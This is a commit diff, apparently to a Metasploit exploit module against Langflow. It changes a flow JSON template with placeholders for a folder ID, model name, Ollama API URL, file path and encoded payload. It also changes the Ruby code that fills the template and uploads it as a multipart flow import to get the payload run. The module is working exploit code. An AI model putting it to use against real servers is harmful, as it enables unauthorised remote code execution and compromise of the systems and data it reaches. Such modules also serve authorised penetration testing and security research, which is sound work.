This commit is contained in:
Takah1ro
2026-04-17 07:31:25 +09:00
parent 4c5ed36c88
commit 3cfbb90b0f
2 changed files with 4 additions and 7 deletions
@@ -3,7 +3,6 @@
"edges": [
{
"animated": false,
"className": "",
"data": {
"sourceHandle": {
"dataType": "CSVAgent",
@@ -33,7 +32,6 @@
},
{
"animated": false,
"className": "",
"data": {
"sourceHandle": {
"dataType": "LanguageModelComponent",
@@ -61,7 +59,6 @@
},
{
"animated": false,
"className": "",
"data": {
"sourceHandle": {
"dataType": "TextInput",
@@ -102,7 +99,7 @@
"custom_fields": {},
"description": "Runs a language model given a specified provider.",
"display_name": "Language Model",
"documentation": "https://docs.langflow.org/components-models",
"documentation": "",
"edited": false,
"field_order": [
"provider",
@@ -118,7 +115,6 @@
],
"frozen": false,
"icon": "brain-circuit",
"last_updated": "2026-04-06T03:01:27.454Z",
"legacy": false,
"metadata": {
"dependencies": {
@@ -339,7 +335,7 @@
"advanced": false,
"display_name": "Ollama API URL",
"dynamic": false,
"info": "Endpoint of the Ollama API (Ollama only). Defaults to http://localhost:11434",
"info": "Endpoint",
"input_types": [
"Message"
],
@@ -132,11 +132,12 @@ class MetasploitModule < Msf::Exploit::Remote
exploit_data = exploit_data.gsub('__FOLDERID__', @folder_id)
exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL'])
exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI'])
exploit_data = exploit_data.gsub('__FILEPATH__', path)
exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode)
exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8))
# construct POST data
data = Rex::MIME::Message.new
data.add_part(exploit_data.to_json, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
data.add_part(exploit_data, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
# Import a flow
res = send_request_cgi({